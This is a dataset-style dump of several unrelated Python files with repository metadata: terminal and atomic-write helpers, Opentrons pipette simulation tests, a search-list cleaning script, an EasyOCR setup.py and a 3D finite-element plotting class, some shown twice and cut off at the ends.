if 'a' in mode:
raise ValueError(
'Appending to an existing file is not supported, because that '
'would involve an expensive `copy`-operation to a temporary '
'file. Open the file in normal `w`-mode and copy explicitly '
'if that\'s what you\'re after.'
)
if 'x' in mode:
raise ValueError('Use the `overwrite`-parameter instead.')
if 'w' not in mode:
raise ValueError('Atomic writes only make sense with `w`-mode.')
# Atomic writes are more complicated. They work by opening a file
# as a proxy in the same folder and then using the fdopen
# functionality to wrap it in a Python file. Then we wrap it in an
# atomic file that moves the file over on close.
import tempfile
fd, tmp_filename = tempfile.mkstemp(dir=os.path.dirname(filename),
prefix='.__atomic-write')
if encoding is not None:
f = io.open(fd, mode, encoding=encoding, errors=errors)
else:
f = os.fdopen(fd, mode)
return _AtomicFile(f, tmp_filename, os.path.realpath(filename)), True
# Used in a destructor call, needs extra protection from interpreter cleanup.
if hasattr(os, 'replace'):
_replace = os.replace
_can_replace = True
else:
_replace = os.rename
_can_replace = not WIN
class _AtomicFile(object):
def __init__(self, f, tmp_filename, real_filename):
self._f = f
self._tmp_filename = tmp_filename
self._real_filename = real_filename
self.closed = False
@property
def name(self):
return self._real_filename
def close(self, delete=False):
if self.closed:
return
self._f.close()
if not _can_replace:
try:
os.remove(self._real_filename)
except OSError:
pass
_replace(self._tmp_filename, self._real_filename)
self.closed = True
def __getattr__(self, name):
return getattr(self._f, name)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close(delete=exc_type is not None)
def __repr__(self):
return repr(self._f)
auto_wrap_for_ansi = None
colorama = None
get_winterm_size = None
def strip_ansi(value):
return _ansi_re.sub('', value)
def should_strip_ansi(stream=None, color=None):
if color is None:
if stream is None:
stream = sys.stdin
return not isatty(stream)
return not color
# If we're on Windows, we provide transparent integration through
if WIN:
DEFAULT_COLUMNS = 79
from ._winconsole import _get_windows_console_stream, _wrap_std_stream
def _get_argv_encoding():
import locale
return locale.getpreferredencoding()
if PY2:
def raw_input(prompt=''):
sys.stderr.flush()
if prompt:
stdout = _default_text_stdout()
stdout.write(prompt)
stdin = _default_text_stdin()
return stdin.readline().rstrip('\r\n')
try:
import colorama
except ImportError:
pass
else:
_ansi_stream_wrappers = WeakKeyDictionary()
def auto_wrap_for_ansi(stream, color=None):
"""This function wraps a stream so that calls through colorama
are issued to the win32 console API to recolor on demand. It
also ensures to reset the colors if a write call is interrupted
to not destroy the console afterwards.
"""
try:
cached = _ansi_stream_wrappers.get(stream)
except Exception:
cached = None
if cached is not None:
return cached
strip = should_strip_ansi(stream, color)
ansi_wrapper = colorama.AnsiToWin32(stream, strip=strip)
rv = ansi_wrapper.stream
_write = rv.write
def _safe_write(s):
try:
return _write(s)
except Exception:
ansi_wrapper.reset_all()
raise
rv.write = _safe_write
try:
_ansi_stream_wrappers[stream] = rv
except Exception:
pass
return rv
def get_winterm_size():
win = colorama.win32.GetConsoleScreenBufferInfo(
colorama.win32.STDOUT).srWindow
return win.Right - win.Left, win.Bottom - win.Top
else:
def _get_argv_encoding():
return getattr(sys.stdin, 'encoding', None) or get_filesystem_encoding()
_get_windows_console_stream = lambda *x: None
_wrap_std_stream = lambda *x: None
def term_len(x):
return len(strip_ansi(x))
def isatty(stream):
try:
return stream.isatty()
except Exception:
return False
def _make_cached_stream_func(src_func, wrapper_func):
cache = WeakKeyDictionary()
def func():
stream = src_func()
try:
rv = cache.get(stream)
except Exception:
rv = None
if rv is not None:
return rv
rv = wrapper_func()
try:
stream = src_func()
cache[stream] = rv
except Exception:
pass
return rv
return func
_default_text_stdin = _make_cached_stream_func(
lambda: sys.stdin, get_text_stdin)
_default_text_stdout = _make_cached_stream_func(
lambda: sys.stdout, get_text_stdout)
_default_text_stderr = _make_cached_stream_func(
lambda: sys.stderr, get_text_stderr)
binary_streams = {
'stdin': get_binary_stdin,
'stdout': get_binary_stdout,
'stderr': get_binary_stderr,
}
text_streams = {
'stdin': get_text_stdin,
'stdout': get_text_stdout,
'stderr': get_text_stderr,
}
| true | true |
1c3ca4830af7c2131448f1698e9701a6a38724d0 | 5,913 | py | Python | api/tests/opentrons/protocols/context/simulator/test_instrument_context.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | 2 | 2015-11-10T17:49:51.000Z | 2016-01-15T04:43:37.000Z | api/tests/opentrons/protocols/context/simulator/test_instrument_context.py | Opentrons/labware | e21d8db51eac5818477264a45ef12c0a2d15fb72 | [
"Apache-2.0"
] | null | null | null | api/tests/opentrons/protocols/context/simulator/test_instrument_context.py | Opentrons/labware | e21d8db51eac5818477264a45ef12c0a2d15fb72 | [
"Apache-2.0"
] | null | null | null | """Test instrument context simulation."""
from typing import Callable
import pytest
from pytest_lazyfixture import lazy_fixture
from opentrons.hardware_control import NoTipAttachedError
from opentrons.hardware_control.types import TipAttachedError
from opentrons.protocols.context.labware import AbstractLabware
from opentrons.protocols.context.instrument import AbstractInstrument
@pytest.fixture(
params=[
lazy_fixture("instrument_context"),
lazy_fixture("simulating_instrument_context"),
]
)
def subject(request) -> AbstractInstrument:
return request.param
def test_same_pipette(
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
) -> None:
"""It should have the same pipette as hardware backed instrument context."""
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
def test_aspirate_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform ASPIRATE"):
subject.aspirate(volume=1, rate=1)
def test_prepare_to_aspirate_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform PREPARE_ASPIRATE"):
subject.prepare_for_aspirate()
def test_dispense_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform DISPENSE"):
subject.dispense(volume=1, rate=1)
def test_drop_tip_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform DROPTIP"):
subject.drop_tip(home_after=False)
def test_blow_out_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform BLOWOUT"):
subject.blow_out()
def test_pick_up_tip_no_tip(
subject: AbstractInstrument, labware: AbstractLabware
) -> None:
"""It should raise an error if a tip is already attached."""
subject.home()
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
with pytest.raises(TipAttachedError):
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
def test_aspirate_too_much(
subject: AbstractInstrument, labware: AbstractLabware
) -> None:
"""It should raise an error if try to aspirate more than possible."""
subject.home()
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
subject.prepare_for_aspirate()
with pytest.raises(
AssertionError, match="Cannot aspirate more than pipette max volume"
):
subject.aspirate(subject.get_max_volume() + 1, rate=1)
def test_working_volume(subject: AbstractInstrument, labware: AbstractLabware) -> None:
"""It should have the correct working volume."""
subject.home()
assert subject.get_pipette()["working_volume"] == 300
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
assert subject.get_pipette()["working_volume"] == 100
@pytest.mark.parametrize(
argnames=["side_effector"],
argvalues=[
[lambda i: None],
[lambda i: i.set_flow_rate(aspirate=212, dispense=44, blow_out=22)],
[lambda i: i.set_pipette_speed(aspirate=212, dispense=44, blow_out=22)],
],
)
def test_pipette_dict(
side_effector: Callable[[AbstractInstrument], None],
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
) -> None:
"""It should be the same."""
side_effector(instrument_context)
side_effector(simulating_instrument_context)
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
def _aspirate(i: AbstractInstrument) -> None:
"""pipette dict with tip fixture."""
i.prepare_for_aspirate()
i.aspirate(12, 10)
def _aspirate_dispense(i: AbstractInstrument) -> None:
"""pipette dict with tip fixture."""
i.prepare_for_aspirate()
i.aspirate(12, 10)
i.dispense(2, 2)
def _aspirate_blowout(i: AbstractInstrument) -> None:
"""pipette dict with tip fixture."""
i.prepare_for_aspirate()
i.aspirate(11, 13)
i.blow_out()
@pytest.mark.parametrize(
argnames=["side_effector"],
argvalues=[
[lambda i: None],
[_aspirate],
[_aspirate_dispense],
[_aspirate_blowout],
],
)
def test_pipette_dict_with_tip(
side_effector: Callable[[AbstractInstrument], None],
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
labware: AbstractLabware,
) -> None:
"""It should be the same."""
# Home first
instrument_context.home()
simulating_instrument_context.home()
# Pickup tip
instrument_context.pick_up_tip(
well=labware.get_wells()[0], tip_length=2, presses=3, increment=4
)
simulating_instrument_context.pick_up_tip(
well=labware.get_wells()[0], tip_length=2, presses=3, increment=4
)
side_effector(instrument_context)
side_effector(simulating_instrument_context)
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
# Drop tip and compare again
instrument_context.drop_tip(home_after=False)
simulating_instrument_context.drop_tip(home_after=False)
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
| 32.311475 | 87 | 0.718079 | from typing import Callable
import pytest
from pytest_lazyfixture import lazy_fixture
from opentrons.hardware_control import NoTipAttachedError
from opentrons.hardware_control.types import TipAttachedError
from opentrons.protocols.context.labware import AbstractLabware
from opentrons.protocols.context.instrument import AbstractInstrument
@pytest.fixture(
params=[
lazy_fixture("instrument_context"),
lazy_fixture("simulating_instrument_context"),
]
)
def subject(request) -> AbstractInstrument:
return request.param
def test_same_pipette(
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
) -> None:
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
def test_aspirate_no_tip(subject: AbstractInstrument) -> None:
with pytest.raises(NoTipAttachedError, match="Cannot perform ASPIRATE"):
subject.aspirate(volume=1, rate=1)
def test_prepare_to_aspirate_no_tip(subject: AbstractInstrument) -> None:
with pytest.raises(NoTipAttachedError, match="Cannot perform PREPARE_ASPIRATE"):
subject.prepare_for_aspirate()
def test_dispense_no_tip(subject: AbstractInstrument) -> None:
with pytest.raises(NoTipAttachedError, match="Cannot perform DISPENSE"):
subject.dispense(volume=1, rate=1)
def test_drop_tip_no_tip(subject: AbstractInstrument) -> None:
with pytest.raises(NoTipAttachedError, match="Cannot perform DROPTIP"):
subject.drop_tip(home_after=False)
def test_blow_out_no_tip(subject: AbstractInstrument) -> None:
with pytest.raises(NoTipAttachedError, match="Cannot perform BLOWOUT"):
subject.blow_out()
def test_pick_up_tip_no_tip(
subject: AbstractInstrument, labware: AbstractLabware
) -> None:
subject.home()
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
with pytest.raises(TipAttachedError):
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
def test_aspirate_too_much(
subject: AbstractInstrument, labware: AbstractLabware
) -> None:
subject.home()
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
subject.prepare_for_aspirate()
with pytest.raises(
AssertionError, match="Cannot aspirate more than pipette max volume"
):
subject.aspirate(subject.get_max_volume() + 1, rate=1)
def test_working_volume(subject: AbstractInstrument, labware: AbstractLabware) -> None:
subject.home()
assert subject.get_pipette()["working_volume"] == 300
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
assert subject.get_pipette()["working_volume"] == 100
@pytest.mark.parametrize(
argnames=["side_effector"],
argvalues=[
[lambda i: None],
[lambda i: i.set_flow_rate(aspirate=212, dispense=44, blow_out=22)],
[lambda i: i.set_pipette_speed(aspirate=212, dispense=44, blow_out=22)],
],
)
def test_pipette_dict(
side_effector: Callable[[AbstractInstrument], None],
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
) -> None:
side_effector(instrument_context)
side_effector(simulating_instrument_context)
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
def _aspirate(i: AbstractInstrument) -> None:
i.prepare_for_aspirate()
i.aspirate(12, 10)
def _aspirate_dispense(i: AbstractInstrument) -> None:
i.prepare_for_aspirate()
i.aspirate(12, 10)
i.dispense(2, 2)
def _aspirate_blowout(i: AbstractInstrument) -> None:
i.prepare_for_aspirate()
i.aspirate(11, 13)
i.blow_out()
@pytest.mark.parametrize(
argnames=["side_effector"],
argvalues=[
[lambda i: None],
[_aspirate],
[_aspirate_dispense],
[_aspirate_blowout],
],
)
def test_pipette_dict_with_tip(
side_effector: Callable[[AbstractInstrument], None],
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
labware: AbstractLabware,
) -> None:
instrument_context.home()
simulating_instrument_context.home()
instrument_context.pick_up_tip(
well=labware.get_wells()[0], tip_length=2, presses=3, increment=4
)
simulating_instrument_context.pick_up_tip(
well=labware.get_wells()[0], tip_length=2, presses=3, increment=4
)
side_effector(instrument_context)
side_effector(simulating_instrument_context)
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
instrument_context.drop_tip(home_after=False)
simulating_instrument_context.drop_tip(home_after=False)
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
| true | true |
1c3ca4e2960d97005dc4bd4214d06bd624d57dd8 | 673 | py | Python | cleanSearch.py | newnativeabq/mendeley-search | a9d7514deb57c34d72e06b1f33b0e8e9bb9fb090 | [
"MIT"
] | null | null | null | cleanSearch.py | newnativeabq/mendeley-search | a9d7514deb57c34d72e06b1f33b0e8e9bb9fb090 | [
"MIT"
] | null | null | null | cleanSearch.py | newnativeabq/mendeley-search | a9d7514deb57c34d72e06b1f33b0e8e9bb9fb090 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 22 10:57:39 2019
todo pull this directly from google API
@author: vince
"""
slist = []
# Clean the text
with open('search_list.txt') as f:
slist = f.readlines()
for i, row in enumerate(slist):
slist[i] = ' '.join(row.split(' ')[3:])
for i, row in enumerate(slist):
if row.find(' ') == 1:
slist[i] = row[2:]
slist[7] = "HIV/AIDS"
for i, row in enumerate(slist):
slist[i] = row.rstrip()
# Create a set of unique values
search_set = set(slist)
# Write set back to file for later use
with open('search_clean.txt', 'w+') as f:
for item in search_set:
f.write(item+',')
| 19.228571 | 43 | 0.59584 |
slist = []
with open('search_list.txt') as f:
slist = f.readlines()
for i, row in enumerate(slist):
slist[i] = ' '.join(row.split(' ')[3:])
for i, row in enumerate(slist):
if row.find(' ') == 1:
slist[i] = row[2:]
slist[7] = "HIV/AIDS"
for i, row in enumerate(slist):
slist[i] = row.rstrip()
search_set = set(slist)
with open('search_clean.txt', 'w+') as f:
for item in search_set:
f.write(item+',')
| true | true |
1c3ca5321c7dda2b3c987b3d02c18c62d4f35d39 | 1,102 | py | Python | setup.py | Van1us/EasyOCR | a1a88441192beb9f9299d5d78abe54b1a7f7b662 | [
"Apache-2.0"
] | 1 | 2021-08-24T17:46:26.000Z | 2021-08-24T17:46:26.000Z | setup.py | Van1us/EasyOCR | a1a88441192beb9f9299d5d78abe54b1a7f7b662 | [
"Apache-2.0"
] | null | null | null | setup.py | Van1us/EasyOCR | a1a88441192beb9f9299d5d78abe54b1a7f7b662 | [
"Apache-2.0"
] | 1 | 2022-01-04T07:00:12.000Z | 2022-01-04T07:00:12.000Z | """
End-to-End Multi-Lingual Optical Character Recognition (OCR) Solution
"""
from setuptools import setup
from io import open
with open('requirements.txt', encoding="utf-8-sig") as f:
requirements = f.readlines()
def readme():
with open('README.md', encoding="utf-8-sig") as f:
README = f.read()
return README
setup(
name='easyocr',
packages=['easyocr'],
include_package_data=True,
version='1.2.5.1',
install_requires=requirements,
entry_points={"console_scripts": ["easyocr= easyocr.cli:main"]},
license='Apache License 2.0',
description='End-to-End Multi-Lingual Optical Character Recognition (OCR) Solution',
long_description=readme(),
long_description_content_type="text/markdown",
author='Rakpong Kittinaradorn',
author_email='r.kittinaradorn@gmail.com',
url='https://github.com/jaidedai/easyocr',
download_url='https://github.com/jaidedai/easyocr.git',
keywords=['ocr optical character recognition deep learning neural network'],
classifiers=[
'Development Status :: 5 - Production/Stable'
],
)
| 30.611111 | 88 | 0.696915 |
from setuptools import setup
from io import open
with open('requirements.txt', encoding="utf-8-sig") as f:
requirements = f.readlines()
def readme():
with open('README.md', encoding="utf-8-sig") as f:
README = f.read()
return README
setup(
name='easyocr',
packages=['easyocr'],
include_package_data=True,
version='1.2.5.1',
install_requires=requirements,
entry_points={"console_scripts": ["easyocr= easyocr.cli:main"]},
license='Apache License 2.0',
description='End-to-End Multi-Lingual Optical Character Recognition (OCR) Solution',
long_description=readme(),
long_description_content_type="text/markdown",
author='Rakpong Kittinaradorn',
author_email='r.kittinaradorn@gmail.com',
url='https://github.com/jaidedai/easyocr',
download_url='https://github.com/jaidedai/easyocr.git',
keywords=['ocr optical character recognition deep learning neural network'],
classifiers=[
'Development Status :: 5 - Production/Stable'
],
)
| true | true |
1c3ca5e731a0a1f524fc4c9e63a4b5cac3875b51 | 8,217 | py | Python | objects/CSCG/_3d/forms/standard/base/dofs/dof/visualize/matplot/_2sf.py | mathischeap/mifem | 3242e253fb01ca205a76568eaac7bbdb99e3f059 | [
"MIT"
] | 1 | 2020-10-14T12:48:35.000Z | 2020-10-14T12:48:35.000Z | objects/CSCG/_3d/forms/standard/base/dofs/dof/visualize/matplot/_2sf.py | mathischeap/mifem | 3242e253fb01ca205a76568eaac7bbdb99e3f059 | [
"MIT"
] | null | null | null | objects/CSCG/_3d/forms/standard/base/dofs/dof/visualize/matplot/_2sf.py | mathischeap/mifem | 3242e253fb01ca205a76568eaac7bbdb99e3f059 | [
"MIT"
] | null | null | null |
from root.config.main import *
import matplotlib.pyplot as plt
from screws.freeze.main import FrozenOnly
class _3dCSCG_SF_DOF_VISUALIZE_matplot_2SF(FrozenOnly):
""""""
def __init__(self, dof):
""""""
self._dof_ = dof
self._mesh_ = dof._sf_.mesh
self._sf_ = dof._sf_
self._freeze_self_()
def __call__(self, *args, **kwargs):
"""We plot this dof of a standard 0-form."""
if self._sf_.IS.hybrid:
return self.___PRIVATE_matplot_dof_k_form_IS_hybrid__(*args, **kwargs)
else:
return self.___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(*args, **kwargs)
def ___PRIVATE_matplot_dof_k_form_IS_hybrid__(self, *args, **kwargs):
""""""
f_kwargs = self._sf_.___define_parameters___['kwargs']
f_kwargs['is_hybrid'] = False
non_hybrid_form = self._sf_.__class__(self._sf_.mesh, self._sf_.space, **f_kwargs)
dofs = non_hybrid_form.dofs
hy_i = self._dof_._i_
GPs = self._dof_.GLOBAL_positions
assert len(GPs) == 1, f"trivial check!"
pos = GPs[0]
if pos in self._dof_.positions:
Ele, index = pos
nhy_i = non_hybrid_form.numbering.gathering[Ele][index]
else:
nhy_i = None
nhy_i = cOmm.gather(nhy_i, root=mAster_rank)
if rAnk == mAster_rank:
I = 0
for _ in nhy_i:
if _ is not None:
I += 1
NHY_I = _
assert I == 1, "only find one position."
nhy_i = NHY_I
else:
pass
nhy_i = cOmm.bcast(nhy_i, root=mAster_rank)
DI = dofs[nhy_i]
assert len(GPs) == 1, f"A hybrid dof must appear only at 1 place."
GPs = GPs[0]
position = 'in hybrid ME-' + str(GPs[0])
if 'title' not in kwargs:
kwargs['title'] = f"dof#{hy_i} of {self._sf_.k}-form: {self._sf_.standard_properties.name}, " + position
DI.visualize.matplot(*args, **kwargs)
def ___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(
self, density=20, saveto=None, linewidth=0.6, title=None):
""""""
positions = self._dof_.positions
EF = dict()
for E_I in positions:
E, I = E_I
EF[E] = self._sf_.___PRIVATE_element_grid_data_generator_1___(E, density=density)
GPs = self._dof_.GLOBAL_positions
Element_Frames = cOmm.gather(EF, root=mAster_rank)
if rAnk == mAster_rank:
# ------------ prepare figure -----------------------------------------------------------------
fig = plt.figure(figsize=(12, 8))
ax = fig.add_subplot(111, projection='3d')
# make the panes transparent
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
# make the grid lines transparent
ax.xaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
ax.yaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
ax.zaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
ax.tick_params(labelsize=12)
ax.set_xlabel(r'$x$', fontsize=15)
ax.set_ylabel(r'$y$', fontsize=15)
ax.set_zlabel(r'$z$', fontsize=15)
# ------ plot element frame -----------------------------------------------------------------
Element_Frame = dict()
for ef in Element_Frames:
Element_Frame.update(ef)
for e in Element_Frame:
EFe = Element_Frame[e]
if 'xLines_x' in EFe:
X, Y, Z = EFe['xLines_x'], EFe['xLines_y'], EFe['xLines_z']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'gray', linewidth=linewidth)
if 'yLines_x' in EFe:
X, Y, Z = EFe['yLines_x'], EFe['yLines_y'], EFe['yLines_z']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'gray', linewidth=linewidth)
if 'zLines_x' in EFe:
X, Y, Z = EFe['zLines_x'], EFe['zLines_y'], EFe['zLines_z']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'gray', linewidth=linewidth)
X, Y, Z = EFe['xLines_x_B'], EFe['xLines_y_B'], EFe['xLines_z_B']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'green', linewidth=linewidth)
X, Y, Z = EFe['yLines_x_B'], EFe['yLines_y_B'], EFe['yLines_z_B']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'green', linewidth=linewidth)
X, Y, Z = EFe['zLines_x_B'], EFe['zLines_y_B'], EFe['zLines_z_B']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'green', linewidth=linewidth)
x, y, z = EFe['center']['coordinate']
x, y, z = x[0], y[0], z[0]
num = EFe['center']['number']
ax.text(x, y, z, num, color='red', ha='center', va='center', ma='center')
# ------ plot the dof of 2-form ----------------------------------------------------------------
pos = GPs[0]
element, index = pos
i, j, k = np.where(self._sf_.numbering.local[0] == index)
if len(i) == 0:
i, j, k = np.where(self._sf_.numbering.local[1] == index)
if len(i) == 0:
i, j, k = np.where(self._sf_.numbering.local[2] == index)
assert len(i) != 0, f"Must have found the index."
IND = 2
else:
IND = 1
else:
IND = 0
i, j, k = i[0], j[0], k[0]
nodes = self._sf_.space.nodes #
if IND == 0:
x, y, z = nodes[0][i] * np.ones((density, density)), \
np.linspace(nodes[1][j], nodes[1][j+1], density), \
np.linspace(nodes[2][k], nodes[2][k+1], density)
y, z = np.meshgrid(y, z, indexing='ij')
elif IND == 1:
x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
nodes[1][j] * np.ones((density, density)), \
np.linspace(nodes[2][k], nodes[2][k+1], density)
x, z = np.meshgrid(x, z, indexing='ij')
elif IND == 2:
x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
np.linspace(nodes[1][j], nodes[1][j+1], density), \
nodes[2][k] * np.ones((density, density))
x, y = np.meshgrid(x, y, indexing='ij')
else:
raise Exception()
xyz = x, y, z
else:
element = None
xyz = None
xyz, element = cOmm.bcast([xyz, element], root=mAster_rank)
if element in self._mesh_.elements:
xyz = self._mesh_.elements[element].coordinate_transformation.mapping(*xyz)
else:
xyz = None
xyz = cOmm.gather(xyz, root=mAster_rank)
if rAnk == mAster_rank:
for ___ in xyz:
if ___ is not None:
x, y, z = ___
break
ax.plot_surface(x, y, z, color=(0,0,1,0.5))
# --------- title ------------------------------------------------------------------------------
if title is None:
plt.title(f"dof#{self._dof_._i_} of {self._sf_.k}-form: {self._sf_.standard_properties.name}.")
else:
plt.title(title)
# ---------- SAVE TO ---------------------------------------------------------------------------
plt.tight_layout()
if saveto is not None and saveto != '':
plt.savefig(saveto, bbox_inches='tight')
plt.close()
else:
plt.show()
# ================================================================================
return fig | 41.71066 | 116 | 0.458196 |
from root.config.main import *
import matplotlib.pyplot as plt
from screws.freeze.main import FrozenOnly
class _3dCSCG_SF_DOF_VISUALIZE_matplot_2SF(FrozenOnly):
def __init__(self, dof):
self._dof_ = dof
self._mesh_ = dof._sf_.mesh
self._sf_ = dof._sf_
self._freeze_self_()
def __call__(self, *args, **kwargs):
if self._sf_.IS.hybrid:
return self.___PRIVATE_matplot_dof_k_form_IS_hybrid__(*args, **kwargs)
else:
return self.___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(*args, **kwargs)
def ___PRIVATE_matplot_dof_k_form_IS_hybrid__(self, *args, **kwargs):
f_kwargs = self._sf_.___define_parameters___['kwargs']
f_kwargs['is_hybrid'] = False
non_hybrid_form = self._sf_.__class__(self._sf_.mesh, self._sf_.space, **f_kwargs)
dofs = non_hybrid_form.dofs
hy_i = self._dof_._i_
GPs = self._dof_.GLOBAL_positions
assert len(GPs) == 1, f"trivial check!"
pos = GPs[0]
if pos in self._dof_.positions:
Ele, index = pos
nhy_i = non_hybrid_form.numbering.gathering[Ele][index]
else:
nhy_i = None
nhy_i = cOmm.gather(nhy_i, root=mAster_rank)
if rAnk == mAster_rank:
I = 0
for _ in nhy_i:
if _ is not None:
I += 1
NHY_I = _
assert I == 1, "only find one position."
nhy_i = NHY_I
else:
pass
nhy_i = cOmm.bcast(nhy_i, root=mAster_rank)
DI = dofs[nhy_i]
assert len(GPs) == 1, f"A hybrid dof must appear only at 1 place."
GPs = GPs[0]
position = 'in hybrid ME-' + str(GPs[0])
if 'title' not in kwargs:
kwargs['title'] = f"dof#{hy_i} of {self._sf_.k}-form: {self._sf_.standard_properties.name}, " + position
DI.visualize.matplot(*args, **kwargs)
def ___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(
self, density=20, saveto=None, linewidth=0.6, title=None):
positions = self._dof_.positions
EF = dict()
for E_I in positions:
E, I = E_I
EF[E] = self._sf_.___PRIVATE_element_grid_data_generator_1___(E, density=density)
GPs = self._dof_.GLOBAL_positions
Element_Frames = cOmm.gather(EF, root=mAster_rank)
if rAnk == mAster_rank:
fig = plt.figure(figsize=(12, 8))
ax = fig.add_subplot(111, projection='3d')
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.xaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
ax.yaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
ax.zaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
ax.tick_params(labelsize=12)
ax.set_xlabel(r'$x$', fontsize=15)
ax.set_ylabel(r'$y$', fontsize=15)
ax.set_zlabel(r'$z$', fontsize=15)
Element_Frame = dict()
for ef in Element_Frames:
Element_Frame.update(ef)
for e in Element_Frame:
EFe = Element_Frame[e]
if 'xLines_x' in EFe:
X, Y, Z = EFe['xLines_x'], EFe['xLines_y'], EFe['xLines_z']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'gray', linewidth=linewidth)
if 'yLines_x' in EFe:
X, Y, Z = EFe['yLines_x'], EFe['yLines_y'], EFe['yLines_z']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'gray', linewidth=linewidth)
if 'zLines_x' in EFe:
X, Y, Z = EFe['zLines_x'], EFe['zLines_y'], EFe['zLines_z']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'gray', linewidth=linewidth)
X, Y, Z = EFe['xLines_x_B'], EFe['xLines_y_B'], EFe['xLines_z_B']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'green', linewidth=linewidth)
X, Y, Z = EFe['yLines_x_B'], EFe['yLines_y_B'], EFe['yLines_z_B']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'green', linewidth=linewidth)
X, Y, Z = EFe['zLines_x_B'], EFe['zLines_y_B'], EFe['zLines_z_B']
for x, y, z in zip(X, Y, Z):
plt.plot(x, y, z, 'green', linewidth=linewidth)
x, y, z = EFe['center']['coordinate']
x, y, z = x[0], y[0], z[0]
num = EFe['center']['number']
ax.text(x, y, z, num, color='red', ha='center', va='center', ma='center')
pos = GPs[0]
element, index = pos
i, j, k = np.where(self._sf_.numbering.local[0] == index)
if len(i) == 0:
i, j, k = np.where(self._sf_.numbering.local[1] == index)
if len(i) == 0:
i, j, k = np.where(self._sf_.numbering.local[2] == index)
assert len(i) != 0, f"Must have found the index."
IND = 2
else:
IND = 1
else:
IND = 0
i, j, k = i[0], j[0], k[0]
nodes = self._sf_.space.nodes
if IND == 0:
x, y, z = nodes[0][i] * np.ones((density, density)), \
np.linspace(nodes[1][j], nodes[1][j+1], density), \
np.linspace(nodes[2][k], nodes[2][k+1], density)
y, z = np.meshgrid(y, z, indexing='ij')
elif IND == 1:
x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
nodes[1][j] * np.ones((density, density)), \
np.linspace(nodes[2][k], nodes[2][k+1], density)
x, z = np.meshgrid(x, z, indexing='ij')
elif IND == 2:
x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
np.linspace(nodes[1][j], nodes[1][j+1], density), \
nodes[2][k] * np.ones((density, density))
x, y = np.meshgrid(x, y, indexing='ij')
else:
raise Exception()
xyz = x, y, z
else:
element = None
xyz = None
xyz, element = cOmm.bcast([xyz, element], root=mAster_rank)
if element in self._mesh_.elements:
xyz = self._mesh_.elements[element].coordinate_transformation.mapping(*xyz)
else:
